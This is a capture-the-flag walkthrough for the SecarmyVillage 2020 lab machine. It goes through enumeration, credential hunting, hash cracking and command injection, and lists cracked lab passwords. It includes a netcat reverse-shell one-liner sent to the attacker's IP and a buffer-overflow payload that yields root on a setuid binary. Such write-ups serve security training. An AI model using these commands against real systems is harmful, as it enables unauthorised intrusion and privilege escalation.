OSCP Walktrhough - [Secarmy20]

Cover Image for OSCP Walktrhough - [Secarmy20]
Marmeus
Marmeus

Table of Contents

    Introduction

    SecarmyOSCP is one challenge of the many CTF challenges that there were in the SecarmyVillage 2020. In this challenge you will have to get 10 flags correspoding each one to a different challenge covering different topics from web to pwn.

    Enumeration

    First of all, it is needed to scan all open ports that there are in the machine.

    kali@kali:~$ sudo nmap -sS -p- -n --open -T5 192.168.226.138
    [sudo] password for kali: 
    Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-09 12:42 EST
    Nmap scan report for 192.168.226.138
    Host is up (0.00047s latency).
    Not shown: 65531 closed ports
    PORT     STATE SERVICE
    21/tcp   open  ftp
    22/tcp   open  ssh
    80/tcp   open  http
    1337/tcp open  waste
    MAC Address: 00:0C:29:ED:ED:EE (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 2.97 seconds

    In order to know more in depth which services are running inside each port, the next command has been executed.

    kali@kali:$ sudo nmap -sC -sV -p21,22,80,1337 -n --open -T5 192.168.226.138
    PORT     STATE SERVICE VERSION
    21/tcp   open  ftp     vsftpd 2.0.8 or later
    |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | ftp-syst:
    |   STAT:
    | FTP server status:
    |      Connected to ::ffff:192.168.226.136
    |      Logged in as ftp
    |      TYPE: ASCII
    |      No session bandwidth limit
    |      Session timeout in seconds is 300
    |      Control connection is plain text
    |      Data connections will be plain text
    |      At session startup, client count was 4
    |      vsFTPd 3.0.3 - secure, fast, stable
    |_End of status
    22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 2c:54:d0:5a:ae:b3:4f:5b:f8:65:5d:13:c9:ee:86:75 (RSA)
    |   256 0c:2b:3a:bd:80:86:f8:6c:2f:9e:ec:e4:7d:ad:83:bf (ECDSA)
    |_  256 2b:4f:04:e0:e5:81:e4:4c:11:2f:92:2a:72:95:58:4e (ED25519)   
    80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Totally Secure Website
    1337/tcp open  waste?
    | fingerprint-strings: 
    |   DNSStatusRequestTCP, GetRequest, HTTPOptions, Help, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
    |     Welcome to SVOS Password Recovery Facility!
    |     Enter the super secret token to proceed: 
    |     Invalid token!
    |     Exiting!
    |   DNSVersionBindReqTCP, GenericLines, NULL, RPCCheck: 
    |     Welcome to SVOS Password Recovery Facility!
    |_    Enter the super secret token to proceed:
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port1337-TCP:V=7.91%I=7%D=10/29%Time=5F9AE38C%P=x86_64-pc-linux-gnu%r(N
    SF:ULL,58,"\n\x20Welcome\x20to\x20SVOS\x20Password\x20Recovery\x20Facility
    SF:!\n\x20Enter\x20the\x20super\x20secret\x20token\x20to\x20proceed:\x20")
    SF:%r(GenericLines,58,"\n\x20Welcome\x20to\x20SVOS\x20Password\x20Recovery
    SF:\x20Facility!\n\x20Enter\x20the\x20super\x20secret\x20token\x20to\x20pr
    SF:oceed:\x20")%r(GetRequest,74,"\n\x20Welcome\x20to\x20SVOS\x20Password\x
    SF:20Recovery\x20Facility!\n\x20Enter\x20the\x20super\x20secret\x20token\x
    SF:20to\x20proceed:\x20\n\x20Invalid\x20token!\n\x20Exiting!\x20\n")%r(HTT
    SF:POptions,74,"\n\x20Welcome\x20to\x20SVOS\x20Password\x20Recovery\x20Fac
    SF:ility!\n\x20Enter\x20the\x20super\x20secret\x20token\x20to\x20proceed:\
    SF:x20\n\x20Invalid\x20token!\n\x20Exiting!\x20\n")%r(RTSPRequest,74,"\n\x
    SF:20Welcome\x20to\x20SVOS\x20Password\x20Recovery\x20Facility!\n\x20Enter
    SF:\x20the\x20super\x20secret\x20token\x20to\x20proceed:\x20\n\x20Invalid\
    SF:x20token!\n\x20Exiting!\x20\n")%r(RPCCheck,58,"\n\x20Welcome\x20to\x20S
    SF:VOS\x20Password\x20Recovery\x20Facility!\n\x20Enter\x20the\x20super\x20
    SF:secret\x20token\x20to\x20proceed:\x20")%r(DNSVersionBindReqTCP,58,"\n\x
    SF:20Welcome\x20to\x20SVOS\x20Password\x20Recovery\x20Facility!\n\x20Enter
    SF:\x20the\x20super\x20secret\x20token\x20to\x20proceed:\x20")%r(DNSStatus
    SF:RequestTCP,74,"\n\x20Welcome\x20to\x20SVOS\x20Password\x20Recovery\x20F
    SF:acility!\n\x20Enter\x20the\x20super\x20secret\x20token\x20to\x20proceed
    SF::\x20\n\x20Invalid\x20token!\n\x20Exiting!\x20\n")%r(Help,74,"\n\x20Wel
    SF:come\x20to\x20SVOS\x20Password\x20Recovery\x20Facility!\n\x20Enter\x20t
    SF:he\x20super\x20secret\x20token\x20to\x20proceed:\x20\n\x20Invalid\x20to
    SF:ken!\n\x20Exiting!\x20\n")%r(SSLSessionReq,74,"\n\x20Welcome\x20to\x20S
    SF:VOS\x20Password\x20Recovery\x20Facility!\n\x20Enter\x20the\x20super\x20
    SF:secret\x20token\x20to\x20proceed:\x20\n\x20Invalid\x20token!\n\x20Exiti
    SF:ng!\x20\n")%r(TerminalServerCookie,74,"\n\x20Welcome\x20to\x20SVOS\x20P
    SF:assword\x20Recovery\x20Facility!\n\x20Enter\x20the\x20super\x20secret\x
    SF:20token\x20to\x20proceed:\x20\n\x20Invalid\x20token!\n\x20Exiting!\x20\
    SF:n")%r(TLSSessionReq,74,"\n\x20Welcome\x20to\x20SVOS\x20Password\x20Reco
    SF:very\x20Facility!\n\x20Enter\x20the\x20super\x20secret\x20token\x20to\x
    SF:20proceed:\x20\n\x20Invalid\x20token!\n\x20Exiting!\x20\n");
    MAC Address: 00:0C:29:ED:ED:EE (VMware)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Based on the previous results the following information has been gathered.

    1. FTP allows to login clients anonymously.
    2. SSH service for Ubuntu.
    3. HTTP stores a web site named "Totally Secure Website".
    4. 1337 seems to be a Password recovery service.

    Flag 1

    Accessing to the website appears the following title.

    image-20201109190135065

    Using gobuster provides the following directories.

    kali@kali:~$ gobuster dir -t 20 -u http://192.168.226.138/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://192.168.226.138/
    [+] Threads:        20
    [+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/11/09 13:05:41 Starting gobuster
    /javascript (Status: 301)
    /anon (Status: 301)
    /server-status (Status: 403)
    ===============================================================
    2020/11/09 13:06:22 Finished
    ===============================================================

    Looking inside http://192.168.226.138/anon/ appears another title.

    image-20201109190912522

    However, at simple view doesn't seem something like a flag, but looking into the HTML (Ctrl+U) code appears the credentials for user uno,which can be used to access to the machine via SSH, where the flag is stored at the home folder.

    Flag 2

    Reading the "readme.txt" file appears the credentials for the second user. After becoming the user "dos" there is another "readme.txt" file with a quest inside.

    uno@svos:~$ su - dos
    Password: 
    dos@svos:~$ cat readme.txt 
    You are required to find the following string inside the files folder:
    a8211ac1853a1235d48829414626512a
    

    To solve it you can use the following commands.

    dos@svos:~$ grep -R a8211ac1853a1235d48829414626512a files/
    files/file4444.txt:a8211ac1853a1235d48829414626512a
    dos@svos:~$ tail files/file4444.txt
    Tomorrow will bring something new, so leave today as a memory.
    Never underestimate the willingness of the greedy to throw you under the bus.
    She had that tint of craziness in her soul that made her believe she could actually make a difference.
    A purple pig and a green donkey flew a kite in the middle of the night and ended up sunburnt.
    There are no heroes in a punk rock band.
    The sky is clear; the stars are twinkling.
    The beauty of the African sunset disguised the danger lurking nearby.
    
    a8211ac1853a1235d48829414626512a
    Look inside file3131.txt
    dos@svos:~$ cat files/file3131.txt
    ...
    UEsDBBQDAAAAADOiO1EAAAAAAAAAAAAAAAALAAAAY2hhbGxlbmdlMi9QSwMEFAMAAAgAFZI2Udrg
    tPY+AAAAQQAAABQAAABjaGFsbGVuZ2UyL2ZsYWcyLnR4dHPOz0svSiwpzUksyczPK1bk4vJILUpV
    L1aozC8tUihOTc7PS1FIy0lMB7LTc1PzSqzAPKNqMyOTRCPDWi4AUEsDBBQDAAAIADOiO1Eoztrt
    dAAAAIEAAAATAAAAY2hhbGxlbmdlMi90b2RvLnR4dA3KOQ7CMBQFwJ5T/I4u8hrbdCk4AUjUXp4x
    IsLIS8HtSTPVbPsodT4LvUanUYff6bHd7lcKcyzLQgUN506/Ohv1+cUhYsM47hufC0WL1WdIG4WH
    80xYiZiDAg8mcpZNciu0itLBCJMYtOY6eKG8SjzzcPoDUEsBAj8DFAMAAAAAM6I7UQAAAAAAAAAA
    AAAAAAsAJAAAAAAAAAAQgO1BAAAAAGNoYWxsZW5nZTIvCgAgAAAAAAABABgAgMoyJN2U1gGA6WpN
    3pDWAYDKMiTdlNYBUEsBAj8DFAMAAAgAFZI2UdrgtPY+AAAAQQAAABQAJAAAAAAAAAAggKSBKQAA
    AGNoYWxsZW5nZTIvZmxhZzIudHh0CgAgAAAAAAABABgAAOXQa96Q1gEA5dBr3pDWAQDl0GvekNYB
    UEsBAj8DFAMAAAgAM6I7USjO2u10AAAAgQAAABMAJAAAAAAAAAAggKSBmQAAAGNoYWxsZW5nZTIv
    dG9kby50eHQKACAAAAAAAAEAGACAyjIk3ZTWAYDKMiTdlNYBgMoyJN2U1gFQSwUGAAAAAAMAAwAo
    AQAAPgEAAAAA
    

    This long string turn out to be an "application.zip" file that you can get using the following website. In order to unzip the file you can use the following command.

    kali@kali:$ unzip application.zip
    Archive:  application.zip
       creating: challenge2/
      inflating: challenge2/flag2.txt    
      inflating: challenge2/todo.txt 
    

    Inside the file "todo.txt" there is a special token.

    Flag 3

    kali@kali:$ cat challenge2/todo.txt 
    Although its total WASTE but... here is your super secret token: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b

    As it has been previously said, there is a service which requires a token to retrieve a password that can be accessed using netcat .

    kali@kali:$ nc 192.168.226.138 1337
    
     Welcome to SVOS Password Recovery Facility!
     Enter the super secret token to proceed: c8e6afe38c2ae9a0283ecfb4e1b7c10f7d96e54c39e727d0e5515ba24a4d1f1b
    
     Here is your login credentials for the third user tres:r4f43l71n4j3r0

    These credentials are used for the FTP service, where there are two files despite the flag.

    Flag 4

    kali@kali:/mnt/hgfs/2_MisPostsBlog/CTFs/HTB$ ftp 192.168.226.138                                                                                                                                                                           
    Connected to 192.168.226.138.                                                                                                                                                                                                              
    220 Welcome to the second challenge!                                                                                                                                                                                                       
    Name (192.168.226.138:kali): tres                                                                                                                                                                                                          
    331 Please specify the password.
    Password:
    230 Login successful.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-rw-r--    1 1003     1003           63 Sep 25 11:49 flag3.txt
    -rw-rw-r--    1 1003     1003          292 Oct 20 15:01 readme.txt
    -rwxrwxr-x    1 1003     1003        20348 Sep 27 14:20 secarmy-village
    226 Directory send OK.

    These files can be downloaded using the following commands.

    ftp> get readme.txt
    local: readme.txt remote: readme.txt
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for readme.txt (292 bytes).
    226 Transfer complete.
    292 bytes received in 0.33 secs (0.8738 kB/s)
    ftp> get secarmy-village
    local: secarmy-village remote: secarmy-village
    200 PORT command successful. Consider using PASV.
    150 Opening BINARY mode data connection for secarmy-village (20348 bytes).
    226 Transfer complete.
    20348 bytes received in 0.02 secs (998.6478 kB/s)
    ftp> 

    The hint for the next flag is the following.

    kali@kali:/mnt/hgfs/2_MisPostsBlog/CTFs/HTB$ cat readme.txt 
    A collection of conditionals has been added in the secarmy-village binary present in this folder reverse it and get the fourth user\'s credentials , if you have any issues with accessing the file you can head over to: https://mega.nz/file/XodTiCJD#YoLtnkxzRe_BInpX6twDn_LFQaQVnjQufFj3Hn1iEyU 

    Using the tool strings provides the password for the user cuatro.

    kali@kali:$ strings -n 7 secarmy-village
    ...
    o:p3dr00l1v4r3zct
    ...

    However, the actual password for user cuatro is "p3dr00l1v4r3z".

    Flag 5

    In the "todo.txt" file there is the next challenge for the flag 5.

    cuatro@svos:~$ cat todo.txt 
    We have just created a new web page for our upcoming platform, its a photo gallery. You can check them out at /justanothergallery on the webserver.

    It is a web site with a bunch of QR codes.

    image-20201109200546547

    In order to download all of them you need to execute the following command.

    kali@kali:$ wget -r -N --no-parent --reject '*index.html*' -nH --cut-dirs=1 http://192.168.226.138/justanothergallery/

    Now, in order to decode them you can execute this script.

    import os
    
    for i in range(0,69):
    print(os.popen("zbarimg QRs/image-"+str(i)+".png | grep 'QR-Code'").read())

    Between all these lines that appear on the screen, you can get the user cinco's credentials for SSH.

    ...
    QR-Code:cinco:ruy70m35
    ...

    Flag 6

    Doing cat in cinco's home directory shows the information for the next challenge.

    cinco@svos:~$ cat readme.txt 
    Check for Cinco's secret place somewhere outside the house

    There is a file in /cinco-secrets/ named shadow.bak owned by cinco but with just write permissions, so in order to read its contents its permissions must be changed using the following command.

    cinco@svos:~$ chmod 777 shadow.bak

    The last line can be copied into a new file on our machine so we can extract seis's password using JohnTheRipper. The command will be the following.

    kali@kali:$ john shadow.bak -w=/usr/share/wordlists/rockyou.txt 
    Using default input encoding: UTF-8
    Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
    Cost 1 (iteration count) is 5000 for all loaded hashes
    Will run 3 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    0g 0:00:00:20 0.18% (ETA: 17:37:39) 0g/s 1540p/s 1540c/s 1540C/s love2u..angel85
    Hogwarts         (seis)
    1g 0:00:00:47 DONE (2020-10-29 14:32) 0.02100g/s 1617p/s 1617c/s 1617C/s Teddy..30121991
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed
    

    Flag 7

    seis@svos:~$ cat readme.txt 
    head over to /shellcmsdashboard webpage and find the credentials!

    The web site looks like this, where we need to find some credentials to access to the Shell CMS.

    image-20201109221632248

    The credentials are stored at the robots.txt file in the following URL http://192.168.226.138/shellcmsdashboard/robots.txt

    # Username: admin Password: qwerty
    User-agent: *
    Allow: /
    

    Introducing the credentials appears a text saying "head over to /aabbzzee.php", accessing to that file appears a users searcher.

    It appears to be executing bash commands, because sending "echo 'HOLA' " shows "HOLA" on the we web page, so we can create a reverse shell getting access to the virtual machine. In order to do that we need to write the following command in our virtual machine

    kali@kali:$ rlwrap -nc -nlvp 4444

    and sending this command through the web form (You need to change the IP address).

    touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.226.136 4444 > /tmp/f

    In the /var/www/html/shellcmsdashboard folder there is a file named readme9213.txt owned by www-data but without read permission. However, changing its permissions we can retrieve the password for user siete.

    $ chmod 777 readme9213.txt
    $ cat readme9213.txt
    password for the seventh user is 6u1l3rm0p3n473

    Flag 8

    In the siete's home directory there are several files.

    siete@svos:~$ ls -l
    total 28
    -rw-rw-r-- 1 siete siete  61 Oct  5 13:47 flag7.txt
    -rw-rw-r-- 1 siete siete  41 Oct 19 19:25 hint.txt
    -rw-r--r-- 1 siete siete   2 Oct 13 20:18 key.txt
    -rw-r--r-- 1 siete siete  41 Oct 13 20:25 message.txt
    -rw-r--r-- 1 siete siete 137 Oct 13 20:19 mighthelp.go
    -rw-rw-r-- 1 siete siete 247 Oct 13 20:39 password.zip

    The password.zip file requires a password to get the file password.txt for that you need to decrypt the message.txt using the key "x" (inside the key.txt file). To do so you need to visit the following page.

    image-20201109231301630

    Flag 9

    In the ocho's home directory there is a *keyboard.pcapng * that you need to download in order to look what is inside with wireshark. Applying the filer "tcp.stream eq 200".

    Then right click into some "GET" package and lick /Follow/HTTP Stream/

    Reading the text appears some encrypted stuff which can be decrypted with the following link.

    image-20201109231301630
    image-20201110002841603

    Flag 10

    Inside the nueve's home directory there is a binary with SETUID as root.

    nueve@svos:~$ ls -l
    total 28
    -rwxrwxr-x 1 nueve nueve   29 Oct 29 21:51 exploit.txt
    -rw-rw-r-- 1 nueve nueve   61 Oct  5 08:54 flag9.txt
    ---Sr-xr-x 1 root  root  8728 Oct  5 13:31 orangutan
    -rw-r--r-- 1 root  root  6360 Oct 16 17:29 readme.txt

    Using ghidra we can see the source code of the program.

    image-20201110004215403

    As we can see in the code, in order to get a shell as root we need to write the value 0xcafebabe in the variable local_10. In order to do so we need to produce a Buffer Overflow in the variable local_28 through the method gets. The creation of the payload should look like this. (Python 2)

    kali@kali:$ python -c "print 'A'*24+'\xbe\xba\xfe\xca'" > exploit.txt

    Then, upload it to the secarmy machine using scp and execute it with the following command, becoming root }:)

    (cat exploit.txt; cat -) | ./orangutan

    Note: If you want to learn more information about **Binary Exploitation I encourage you to read this post.

    Credentials

    uno:luc10r4m0n
    dos:4b3l4rd0fru705
    tres:r4f43l71n4j3r0
    cuatro:p3dr00l1v4r3z
    cinco:ruy70m35
    seis:Hogwarts
    siete:6u1l3rm0p3n473
    ocho: m0d3570v1ll454n4
    nueve:355u4z4rc0